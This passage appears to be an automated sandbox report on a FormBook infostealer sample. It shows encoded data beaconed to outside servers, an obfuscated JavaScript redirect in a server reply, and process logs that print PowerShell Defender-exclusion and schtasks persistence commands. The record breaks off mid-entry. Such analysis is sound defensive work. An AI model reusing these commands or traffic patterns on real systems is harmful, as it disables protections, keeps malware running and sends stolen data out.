                                              Data Raw: 61 76 52 68 6e 3d 39 7a 69 76 33 2f 7a 76 42 31 42 74 65 6b 7a 51 6b 67 6d 72 6c 32 53 50 51 41 30 50 58 42 64 6a 43 64 73 37 55 78 6e 61 4b 43 62 46 4b 72 6b 2b 78 35 62 75 4a 47 4e 57 7a 45 74 50 45 57 79 63 32 30 5a 78 75 4c 49 44 5a 41 41 61 74 59 4a 55 56 6d 49 63 6a 73 79 51 4e 47 67 4e 59 43 48 35 36 35 36 4c 78 56 72 39 79 59 42 67 34 32 78 78 31 49 37 4e 31 53 2b 4c 2b 6d 77 57 4b 73 31 48 57 6b 47 78 32 75 67 44 2b 53 47 5a 4a 33 78 34 76 79 73 6c 6b 50 6c 44 63 46 79 59 37 7a 64 64 37 76 65 43 63 73 76 33 74 58 74 53 65 56 72 4a 73 42 4e 4a 32 63 66 76 41 6b 79 66 37 34 53 38 30 74 37 55 48 77 48 4a 4b 43 68 39 6f 50 47 31 41 66 35 74 6d 45 66 53 46 46 66 50 44 65 47 30 69 72 6d 39 6b 6b 5a 4c 44 64 43 61 79 39 63 41 34 53 55 49 31 66 72 39 5a 65 7a 37 42 2f 70 4f 68 76 54 6a 76 77 31 72 45 61 66 4c 75 53 73 4a 30 51 79 75 62 35 45 31 4d 64 4f 31 61 2b 2b 65 52 57 61 4f 79 39 64 47 6f 44 74 6c 44 36 4e 53 2b 39 4c 6d 58 78 6f 43 74 4a 66 66 78 34 33 6a 62 79 48 79 56 38 6c 52 7a 6d 30 66 [TRUNCATED]
                                              Data Ascii: avRhn=9ziv3/zvB1BtekzQkgmrl2SPQA0PXBdjCds7UxnaKCbFKrk+x5buJGNWzEtPEWyc20ZxuLIDZAAatYJUVmIcjsyQNGgNYCH5656LxVr9yYBg42xx1I7N1S+L+mwWKs1HWkGx2ugD+SGZJ3x4vyslkPlDcFyY7zdd7veCcsv3tXtSeVrJsBNJ2cfvAkyf74S80t7UHwHJKCh9oPG1Af5tmEfSFFfPDeG0irm9kkZLDdCay9cA4SUI1fr9Zez7B/pOhvTjvw1rEafLuSsJ0Qyub5E1MdO1a++eRWaOy9dGoDtlD6NS+9LmXxoCtJffx43jbyHyV8lRzm0fP130UcJEr4kfB8QS0hehzmvpnZRcvGWVNEki/FpzUee0py/sNJXMisIxnx907SJe7tCtW9wBfe0z5lY4tsuqTYeT1ke2zL726/uZ6aHoqNvgXJSYPkXV6A5DIQ7ZaBALaAK4Q9iZibg7NW/EnnX6X/dcBFb4ECwo2XIKecmtNgIpXqzzm+b9iGFGZ84jsbJYQS0/v30R8F1MdOVaiIQtdMlQVoxUX5G4hChVv4SpeDI2hwm4ci6n6hXsfY0zLBcPTJiOlVc5jgZDFU+4g4zX3yoSHAkNrHFD3Kt/3trfZwXltftWT6W8j2TR+zjACmyH0SdMqFr+cXXE0yXJiL6Hdru2IOHj5Xs+LeO0jIvS7aoaULwEQ6akNrktcuU0Mx3wWsr3ktJ92oPYh6cQVsAFBkbKltNBC2VbcJbGfFNjxzLRzBknbMqEkjRXHgZQucM5C5cTMJoCOkCZvr3bu5OFWf4+i2oXfEojipgzIoUNMJH+YNJxvMyTua0eRnEH7adTlpnLC5mh6bW+7EfVlzNjrDoTViQfimhcJ/+5kEunWPMkoyEhfs0EPU4hqV1voycNOMauPAveGWaKmY+GnLZ945Si5/VD9hL5ThjXeQA6g+bTiiJMvG8pG/DxarOx/cDDxzBUhSbFlxpyQqjxiC0uIjdbgPX29xoBq6 [TRUNCATED]
                                              Jan 11, 2025 05:22:47.764566898 CET364INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Encoding: gzip
                                              Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 26 be 46 5e 19 3e b9 7e 79 be 21 39 85 91 c1 a6 e5 c9 b9 16 66 7e 59 91 95 fe 8e b6 b6 ea 9a 36 fa 50 13 01 42 55 a9 14 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 67)N.,(ON,VPV/Ji%IAf>&F^>~y!9f~Y6PBUZ0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.849955154.88.22.107805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:22:49.415225983 CET510OUTGET /63n1/?fjo=vjgP0XDx&avRhn=wxKP0Ki1Kkw6YH7/nhrbl3WDemgIBFZSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAstOOZytUbFrdg7631H3C/N1OxVxb3rHD3zi4wEM6AspOKA== HTTP/1.1
                                              Host: www.cg19g5.pro
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Jan 11, 2025 05:22:50.301038027 CET332INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Strict-Transport-Security: max-age=31536000
                                              Data Raw: 34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 34 4d 32 4a 68 4c 6d 4e 6e 4d 54 6c 71 59 53 35 77 63 6d 38 36 4e 6a 59 79 4f 41 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly84M2JhLmNnMTlqYS5wcm86NjYyOA=c=')</script>0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.849988154.23.184.95805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:22:56.061652899 CET763OUTPOST /ebw6/ HTTP/1.1
                                              Host: www.hm35s.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hm35s.top
                                              Referer: http://www.hm35s.top/ebw6/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 206
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 74 35 69 74 4d 39 49 58 6a 6c 51 48 50 54 77 5a 2f 6a 33 6b 6b 49 78 4b 41 36 6a 4c 45 36 38 78 72 70 39 4e 44 7a 4d 69 47 48 67 4c 75 2b 74 6a 78 71 46 54 41 73 2f 71 72 49 47 62 4a 6b 45 71 32 4a 50 33 74 48 2b 36 4e 35 70 4c 6d 68 6b 64 4c 31 4f 56 4a 72 48 58 4e 71 51 4d 50 6e 54 42 34 4d 51 51 6f 4c 30 46 42 67 57 38 53 4b 31 38 4b 4b 59 72 71 72 34 6d 30 35 53 57 6e 36 59 48 46 55 59 51 4d 77 37 38 2b 2b 67 44 47 55 42 34 51 52 4e 32 53 74 51 4c 6e 6d 66 50 61 66 4b 39 53 49 4e 6e 43 74 30 6d 67 66 4f 73 41 33 54 2f 68 58 63 4b 48 7a 4e 6c 70 61 7a 6d 2f 44 47 68 43 57 49 48 49 4c 34 3d
                                              Data Ascii: avRhn=t5itM9IXjlQHPTwZ/j3kkIxKA6jLE68xrp9NDzMiGHgLu+tjxqFTAs/qrIGbJkEq2JP3tH+6N5pLmhkdL1OVJrHXNqQMPnTB4MQQoL0FBgW8SK18KKYrqr4m05SWn6YHFUYQMw78++gDGUB4QRN2StQLnmfPafK9SINnCt0mgfOsA3T/hXcKHzNlpazm/DGhCWIHIL4=
                                              Jan 11, 2025 05:22:56.825022936 CET312INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:56 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "66a5f968-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.849989154.23.184.95805124C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:22:58.624088049 CET783OUTPOST /ebw6/ HTTP/1.1
                                              Host: www.hm35s.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hm35s.top
                                              Referer: http://www.hm35s.top/ebw6/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 226
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 74 35 69 74 4d 39 49 58 6a 6c 51 48 50 7a 41 5a 2b 41 76 6b 6d 6f 78 4a 50 61 6a 4c 4e 61 38 31 72 70 68 4e 44 79 5a 76 48 31 45 4c 67 38 31 6a 72 6f 74 54 4e 4d 2f 71 7a 34 47 65 47 45 45 68 32 4a 43 49 74 43 65 36 4e 34 4e 4c 6d 6a 38 64 4b 43 53 57 49 37 48 52 42 4b 51 4f 58 48 54 42 34 4d 51 51 6f 4c 78 65 42 68 79 38 52 37 46 38 4c 72 59 71 67 4c 34 6e 39 5a 53 57 31 4b 59 4c 46 55 59 49 4d 30 61 72 2b 38 59 44 47 55 52 34 52 41 4e 35 5a 74 51 46 6a 6d 65 71 61 73 36 77 49 36 70 77 47 2f 70 49 6a 2f 43 51 49 68 69 56 37 31 55 4d 45 7a 6c 4f 70 5a 62 51 36 30 62 4a 59 31 59 33 57 63 76 58 79 4d 50 48 74 70 44 73 41 78 4e 57 42 37 4e 47 6a 4d 70 59
                                              Data Ascii: avRhn=t5itM9IXjlQHPzAZ+AvkmoxJPajLNa81rphNDyZvH1ELg81jrotTNM/qz4GeGEEh2JCItCe6N4NLmj8dKCSWI7HRBKQOXHTB4MQQoLxeBhy8R7F8LrYqgL4n9ZSW1KYLFUYIM0ar+8YDGUR4RAN5ZtQFjmeqas6wI6pwG/pIj/CQIhiV71UMEzlOpZbQ60bJY1Y3WcvXyMPHtpDsAxNWB7NGjMpY
                                              Jan 11, 2025 05:22:59.498217106 CET312INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:22:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "66a5f968-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11192.168.2.849990154.23.184.9580
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:23:01.700735092 CET1800OUTPOST /ebw6/ HTTP/1.1
                                              Host: www.hm35s.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hm35s.top
                                              Referer: http://www.hm35s.top/ebw6/
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: max-age=0
                                              Content-Length: 1242
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Data Raw: 61 76 52 68 6e 3d 74 35 69 74 4d 39 49 58 6a 6c 51 48 50 7a 41 5a 2b 41 76 6b 6d 6f 78 4a 50 61 6a 4c 4e 61 38 31 72 70 68 4e 44 79 5a 76 48 31 4d 4c 67 50 39 6a 6f 50 78 54 4d 4d 2f 71 36 59 47 66 47 45 45 47 32 49 71 4d 74 43 44 50 4e 37 6c 4c 38 41 30 64 66 47 6d 57 47 4c 48 52 63 36 51 44 50 6e 53 62 34 4d 41 63 6f 4c 68 65 42 68 79 38 52 34 64 38 4e 36 59 71 6d 4c 34 6d 30 35 53 61 6e 36 59 6e 46 55 41 59 4d 79 47 37 2b 73 34 44 47 77 4e 34 54 79 31 35 62 4e 51 48 76 47 65 49 61 73 33 77 49 37 45 4a 47 2b 63 54 6a 39 53 51 59 33 44 72 6d 46 67 73 53 44 6b 34 6c 5a 37 64 30 6b 37 2b 59 31 45 42 58 38 6e 48 79 37 7a 61 71 5a 50 76 56 67 5a 59 58 39 31 76 68 37 59 6b 49 74 32 39 4d 6d 76 65 65 66 75 66 54 36 77 47 48 54 73 33 33 6f 6d 2f 57 66 4d 77 6e 63 38 66 52 69 39 33 7a 7a 78 44 79 32 68 50 47 61 38 65 33 46 59 5a 35 46 45 47 6c 58 50 67 73 2f 34 6c 2f 31 6f 6c 49 78 50 54 4c 32 52 6e 35 32 31 2b 69 56 75 35 46 42 79 64 67 4c 55 57 48 58 6c 45 59 4e 51 49 69 33 30 44 63 69 73 5a 30 5a 4d 6d [TRUNCATED]
                                              Data Ascii: avRhn=t5itM9IXjlQHPzAZ+AvkmoxJPajLNa81rphNDyZvH1MLgP9joPxTMM/q6YGfGEEG2IqMtCDPN7lL8A0dfGmWGLHRc6QDPnSb4MAcoLheBhy8R4d8N6YqmL4m05San6YnFUAYMyG7+s4DGwN4Ty15bNQHvGeIas3wI7EJG+cTj9SQY3DrmFgsSDk4lZ7d0k7+Y1EBX8nHy7zaqZPvVgZYX91vh7YkIt29MmveefufT6wGHTs33om/WfMwnc8fRi93zzxDy2hPGa8e3FYZ5FEGlXPgs/4l/1olIxPTL2Rn521+iVu5FBydgLUWHXlEYNQIi30DcisZ0ZMmAeZ9iRUkDxxmV5943wJz7Y2kkrcFJtP4IrKTSqfqK7rg4qTTmPNhCDripCoyb66HfG/NlOiT0v0WgFyj2a32Y6LbLFcnzpKSZ6ckbk+ycan18aQ2hAA8sh0We2FW+NfkiRRFJ+ZvaLIvNk8YNgF8/WUTUwIU1P+zli611oKqZnKqE3ktk+YYjQu4S4z+u/h8SYIcXGtGWJR5QPnDojPJfG7LFVv2NyAZQdUCB17koVXQe7YFP4Z/ajzPv4zazIwkNLVN52BFOZ1d+0m+d+1nq9P+uoN2WrfcXO7aibtj66UbaC9950kNhUH8hCoxya/yupWlRyxvh6bPxP2gcaj613MIiDWMshYNcyEfojwWxdJiwZ4bXnBEibhSHF0eHuIg8dWMaQx9SOc2Gp6Qmsw0abfJ1zss8JZN+vP7lkTHPA5dKfi+4Xs9lU0DnfzgdT0C44ptOrTsn1sQxJwWfdFx0VMSJF+RvJ+lSaI9ZGGmMZn0Mzt33o3fA2yf9QP0p199HfIm9UgkLdYXpN31sfqO94XyLF/B3+jQ7ZMIO/0B9pikHqb8DGTMD7D8DeHCCNmSjBlEx+Zb1uIv6yCZ84pWxlxNVtHn0/GOAm9pG6Bz9CWQWIYt1GtZWGMTNqUVamEhHryEsbTi50bqlP1E4OPa0tmBzWqJeUoAmm [TRUNCATED]
                                              Jan 11, 2025 05:23:02.595653057 CET312INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:23:02 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "66a5f968-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12192.168.2.849991154.23.184.9580
                                              TimestampBytes transferredDirectionData
                                              Jan 11, 2025 05:23:04.242371082 CET509OUTGET /ebw6/?avRhn=g7KNPNtXo04gJA8a0AickIpMAuCVSKId0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCZ/YcP8NJRKC5us+1o1KLAKIeLhdJLJPk6Ry+qmxzeVySw==&fjo=vjgP0XDx HTTP/1.1
                                              Host: www.hm35s.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                              Jan 11, 2025 05:23:05.129399061 CET312INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sat, 11 Jan 2025 04:23:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 148
                                              Connection: close
                                              ETag: "66a5f968-94"
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:23:20:52
                                              Start date:10/01/2025
                                              Path:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\C6Abn5cBei.exe"
                                              Imagebase:0x140000
                                              File size:757'248 bytes
                                              MD5 hash:3F10D9AE24F018B0CA90A3F5B4365C48
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe"
                                              Imagebase:0xcf0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                                              Imagebase:0xcf0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp"
                                              Imagebase:0xee0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:23:20:58
                                              Start date:10/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:23:20:59
                                              Start date:10/01/2025
                                              Path:C:\Users\user\Desktop\C6Abn5cBei.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\C6Abn5cBei.exe"
                                              Imagebase:0x700000
                                              File size:757'248 bytes
                                              MD5 hash:3F10D9AE24F018B0CA90A3F5B4365C48
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1876572598.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:23:21:02
                                              Start date:10/01/2025
                                              Path:C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              Imagebase:0xe50000
                                              File size:757'248 bytes
                                              MD5 hash:3F10D9AE24F018B0CA90A3F5B4365C48
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 63%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:23:21:03
                                              Start date:10/01/2025
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff605670000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:13
                                              Start time:23:21:11
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp"
                                              Imagebase:0xee0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:23:21:11
                                              Start date:10/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:23:21:12
                                              Start date:10/01/2025
                                              Path:C:\Users\user\AppData\Roaming\zdDlscHlw.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                                              Imagebase:0x7ff6b84b0000
                                              File size:757'248 bytes
                                              MD5 hash:3F10D9AE24F018B0CA90A3F5B4365C48
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:23:21:29
                                              Start date:10/01/2025
